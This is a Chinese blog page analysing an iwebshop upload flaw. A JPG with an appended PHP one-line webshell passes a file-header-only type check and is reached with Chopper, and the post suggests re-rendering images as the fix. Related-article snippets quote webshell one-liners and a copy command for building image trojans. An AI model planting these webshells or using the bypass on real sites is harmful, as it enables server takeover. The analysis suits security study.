iwebshop 上传图片木马 0day代码分析及修复方法

最新推荐文章于 2024-06-26 15:11:06 发布
最新推荐文章于 2024-06-26 15:11:06 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: PHP
本文分析了iwebshop系统中利用图片木马上传webshell的方法,介绍了如何绕过文件类型检查,成功上传包含一句话木马的图片,并实现远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  iwebshop 上传图片木马 0day代码分析及修复方法  2013-08-14 09:45:21

分类: 网络与安全

http://blog.chinaunix.net/uid-29068527-id-3847279.html



网站入侵过程中一个典型方式就是登录后台,上传webshell,本文就是接上篇文章分析如何突破上传限制,上传一个包含一句话木马的图片马。
 
一.找到一个上传位置:

当我们找到上传点时,首先想到的就是直接传webshell上去,可惜iwebshop采用的是swfupload组件进行上传,该组件限定了上传文件的类型,不能直接上传php文件。(当然可以通过burpsuite等代理工具修改上传数据流来突破限制,这种方法没有尝试,但是从后面代码的分析来看是可以的)
 
二.分析代码突破限制
通过文件定位到goods_img_upload()函数
/iwebshop/controllers/ -> goods.php (source)
 

该函数主要是获取图片文件和缩略图文件信息,然后通过实例化PhotoUpload类对象来调用run方法。
/iwebshop/classes/ -> photoupload.php (source)

最关键的是调用了IUpload中的execute函数,也就是真正处理上传逻辑的地方。
/iwebshop/lib/core/util/ -> upload_class.php (source)

在这里就是在上传时对文件的检查,其中一个关键点就是getFileType函数,对上传文件做检查,如果通过了检查(是图片文件),则上传成功。那我们来看他是怎么检查的。
/iwebshop/lib/core/util/ -> file_class.php (source)

很显然,该应用的检查方式仅仅是取文件的前两个字节,通过和php的unpack()返回内容进行比较来确认文件类型(关于unpack请自行查阅php手册)。那么很自然的我们想到,可以通过上传一个jpg图片木马来突破限制,上传webshell。
 
构造jpg图片木马的方式很简单,首先准备一张图片1.jpg,一个写好一句话木马的php文件,使用以下语句:

生成一句话木马2.jpg。
我们通过vim来查看该图片的十六进制内容:
文件头:

文件尾:

可以看到文件头仍然表示这是一个jpg文件,而我们在文件最后插入了一句话木马。
 
好了,现在我们把2.jpg上传到服务器,并找到图片位置:

使用菜刀连接之:

一句话木马成功连接。
 
总结:
这个漏洞出现的原因就是对上传文件没有做很好的内容检查,以为检查了文件头就万事大吉,殊不知上传漏洞是web安全防护中及其重要的部分,有着多种躲避和混淆的手法。另外需要再次强调网站前台和后台的安全性其实是同等重要的,后台的薄弱往往给攻击者以可趁之机。
 
修改建议:
对图片文件进行内容检查,通过现有的一次渲染,二次渲染技术来确定图片文件的真实性。
某数字化校园系统通用型文件上传漏洞getshell(渗透测试-0day
afei001
03-18 1368
目录 1.前言 2.文件上传点(实战复现) 3.提交SRC 4.getshell POC 声明: 仅用于渗透测试,白帽漏洞挖掘。请勿用做非法用途,非法使用造成后果自负。 1.前言 偶然在F12sec上看到一边文章,于是有了今天的挖洞过程。某位白帽子师傅发现某建站系统通用型漏洞,属于0day哦。不过这个0day漏洞也够无语的... 直接无任何限制可上传aspx可执行文件,并且漏洞点就在注册页面。这漏洞的挖掘也是站在巨人“PeiQi”师傅的肩膀上挖到的。 ...
木马——文件上传
主要为C++知识点、Linux知识点,计算机组成结构笔记。
04-21 1672
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。前提是后端一定可以解析这种环境。
[PHP代码审计]iWebShop开源商城系统V5.9.21010存在命令执行漏洞
Y4tacker的博客
06-18 2495
@Y4tacker 文章目录写在前面iWebShop5.9存在命令执行漏洞目录结构漏洞演示及利用 写在前面 感兴趣的师傅可以去CTFSHOW复现 iWebShop5.9存在命令执行漏洞漏洞是后台权限,配合sql注入导致的文件删除,之后导致可重装从而实现RCE 目录结构 漏洞演示及利用 该漏洞的利用比较巧妙,首先我们登录后台,点击添加商户功能 这里添加一个y4tacker/y4tacker,记得开通功能,这里先备用 接下来我们访问,用刚刚的商户账号登录即可 http://url/index.php?c
iWebShop开源商城系统
04-06
作者aircheng,代码iwebshop_v5.0.180303。 开源电子商务系统iWebShop是一个以php+MySQL进行开发的php电子商务平台系统,它包含了团购、限时抢购、物流跟踪等网店平台所具备的功能。后台具备高效的业务分析管理功能。 iWebShop始终坚持产品易用性和代码的整洁高效性,在国内外多如牛毛的电商产品中始终保持着高效的更新效率和极低的bug出错率,在过去的一年里,bug解决率高达100%!!! 只要是用户在使用我们的产品中遇到bug包括:页面无响应,PHP代码出错异常,样式错位兼容性问题(ie8以下的不予考虑),数据异常等,无论是免费用户还是付费用户 我们都会在24小时内解决掉(由于用户自己二次开发导致的问题除外),甚至于个别使用虚拟主机,或者因为服务器目录权限,php环境组件未安装导致的问题,我们也尽可能的提供帮助, 让所有想安装和体验iWebShop的用户都可以得到机会。 开源电子商务系统iWebShop v5.1.180303 更新日志: 新增部分 新增城市定位接口 IClient::getLocal(); 新增积分兑换商品功能 新增service控制器,用于返回json接口数据,与内部API资源共享,支持扩展 增加新订单智能提醒插件(页面无需刷新),右下角弹出框提示和声音提示(您有新的订单...) 新增商家独立店内分类功能,主页可以显示和筛选店内分类商品 新增后台UI主题sysdm,大尺寸扁平化模板 新增加快钱手机支付接口 新增加快钱退款接口 新增阿里云OSS图片服务插件【单独付费】 新增微信小程序插件,支持微信小程序支付,同步登录等【单独付费】 优化升级部分 全面支持兼容最新php7.2版本,速度性能大幅提升 优化了后台网站设置中的首页幻灯片,导航设置独立出来 首页幻灯片banner入库 优化了及封装了后台模板和商家模板代码,代码缩减30%,便于开发后台和商户新的UI主题 调整数据库外键结构,把部分外键数据的移除改写为逻辑控制,提高运行效率减少锁表延迟 重构内核interceptor事件拦截器 IQuery和IModel增加表分区的扩展功能 IQuery和IModel的关键位置增加拦截器事件触发,可以统一拦截数据库操作 提升短信验证码发送机制的安全性 升级手机号码校验规则,增加166和199号段的使用 订单导出增加配送方式和备注信息方便查阅 增加程序如果发生异常也会让当前数据库写操作回滚 升级js校验类,支持file类型和修复password的提示问题 商家后台模板增加奥森字体引入,使用小图标更加方便快捷 内核过滤类新增加date,datetime,time数据类型的检测 将后台登陆地址从systemadmin改为admin 优化了分页功能,让移动端的分页与电脑端呈现不同的样式 升级快钱PC网关支付接口 修正部分 修复用户密码有特殊字符会被转义的问题从而导致密码错误 淘宝CVS商品导入插件增加商品编码的同步导入 修复分类特价活动修改时数据无法回填问题 修复后台左侧菜单按钮高亮问题 商品详情页面选择规格后重新计算运费 优化控制器加载方式,解决classes扩展类与控制器重名导致异常错误 修复了多个不同规格的货品在同一个订单下无法评论的问题 修复了购物车中优惠金额在小于1元情况下的小数点溢出的问题 修复后台分类批量移动无法选择顶级分类的情况
iwebshop上传类的使用
p_ython的博客
07-11 609
$upload = new IUpload('10240000',array('jpg','gif','png')); $dir = "upload/dian"; $upload->setDir($dir); $upload->execute();
文件上传图片木马执行之[SUCTF 2019]CheckIn1
qq_58970968的博客
04-14 2540
参考博文:BUUCTF__[SUCTF 2019]CheckIn_题解_风过江南乱的博客-优快云博客 上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能含有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装; 图片木马的制作,不多说;这里上传jpg木马之后,怎么执行里面的木马呢; 目前学到的有两种方法: 1.在apache中,可以用.htacess文件来实现,可这道题也被正则了 2.用.user.ini (知识点在参考里面也有);大概就.
iwebshop图片上传图片水印插件
11-23
iWebShop是一款流行的开源电商系统,而"iWebShop图片上传图片水印插件"则是针对该系统的一个扩展功能,旨在为商家提供方便的图片处理服务。 首先,我们需要了解什么是图片水印。图片水印通常是在图像上添加的半透明...
iwebshop5.5与阿里云OSS图片上传插件
11-23
iWebShop5.5与阿里云OSS图片上传插件深度解析》 在电子商务领域,网站性能和用户体验是至关重要的因素。iWebShop5.5是一款成熟的开源电商系统,致力于为企业提供高效、稳定的在线商城解决方案。而阿里云对象存储...
iwebshop软件测试-100测试用例+PPT.zip
11-22
iWebShop软件测试全方位解析》 在软件开发过程中,测试是至关重要的环节,它确保产品的稳定性和用户体验。本文将围绕“iWebShop”这款软件的测试进行详细讲解,涵盖UI测试、功能测试、接口测试以及性能测试等方面...
八叔引擎之家_iwebshop图片上传图片水印插件.zip
10-05
《八叔引擎之家_iwebshop图片上传图片水印插件》是一款专为iWebShop电商平台设计的图片处理工具,主要用于在用户上传的商品图片上添加水印,以保护商家的知识产权和品牌标识。这款插件的出现,使得电商网站能够更好...
iWebShop开源商城系统源代码
03-18
iWebShop是一款基于PHP语言及MYSQL数据库开发的B2B2C单用户和多用户开源免费的商城系统,系统支持平台自营和多商家入驻、集成微信商城、手机商城、移动端APP商城、三级分销、微信小程序等于一体,它可以承载大数据量...
iwebshop自行整理手册
02-23
个人博客:夜の猫:目前只有博客地址(个人主站没时间弄)blog.degenerate.cn 有什么错误,请各位大佬们指教,这是我的一个学长做的,代上传,写的自己用的东西,请多多支持!
文件上传漏洞练习2--图片
最新发布
weixin_43520214的博客
06-26 1246
什么是PHP一句话木马,如何构建PHP木马,以及如何使用
文件包含+文件上传漏洞图片马绕过)
woshicainiao666的博客
02-19 2625
文件上传+文件包含(图片上传
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
wangluoanquan111的博客
02-26 1544
此关涉及到了二次渲染的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP。此语句就是一个检测,如果上传的文件是php格式就得不到图片的尺寸,就会返回错误,后面的代码就无法执行,文件就没办法成功上传
图片木马绕过站点上传文件检查
四盘山博客
03-03 5056
第一种方法: 利用copy命令 详细操作为 1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了) 2.<%eval request(“keio”)%> 存为1.asp(就是一句话木马) 3.copy 1.jpg /b + 1.asp /a 2.jpg 解释一下代码 复制当前目录下的 1.jpg
php 上传jpg木马_【学习笔记】常见漏洞:文件上传
weixin_39709194的博客
11-21 1144
第 21课文件上传课程入口(付费)个人背景李,本科,电子信息工程专业,毕业一年半,有JavaScript的,PHP,Python的语言基础,目前自学网络安全中。文件上传01 文件上传漏洞原理文件上传漏洞是指网络攻击者上传文件的时候,如果服务器脚本语言,未对上传的文件进行严格的验证和过滤,就容易造成上传任意文件,包括上传脚本文件。导致我们的服务器被Getshell。一旦我们的服务...
iwebshop index.php,安全登录iwebshop管理员后台修改管理员后台登录路径
weixin_39678531的博客
03-13 580
这款开源使用方便简洁,让初学者能快速建立一个电子商务系统建站。昨天小编我安装了一个Iwebshop程序准备研究,安装的时候一切顺利,访问前台的时候也是很好的,但是访问后台时,怎么输入后台都不行,“/admin”、“/admin.php”、“/shopadmin”等等,大部分开源程序进入后台的方式,小编我都测试了一遍,结果就无奈的去网上寻找了答案,不久这个困扰小编我的问题得到了解决,相信也困扰了此时...
文件上传漏洞学习
weixin_45437468的博客
08-21 1261
一句话木马 <?php @eval($_POST[pass]); ?> 上传一句话木马文件的普通方式都不可以,发现可以上传jpg木马,jpg木马他也进行内容绕过,不能含有<?,但是可以构造其他的,然后还要添加GIF89a进行伪装; 图片马制作 Mac系统和Linux系统 首先在桌面上创建file1.txt并在里面写入一句话木马,下载file2.jpg, 然后,打开终端,cd 到desktop 将file1.txt追加到file2.jpg后面的方法: cat file1.
八叔引擎之家推出iwebshop图片上传及水印插件
资源摘要信息: "八叔引擎之家_iwebshop图片上传图片水印插件"是一个针对iwebshop系统的图片上传功能进行改进的插件。它提供了一个便利的功能,即在用户上传图片时自动添加水印。这个插件的使用可以保护图片的版权,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值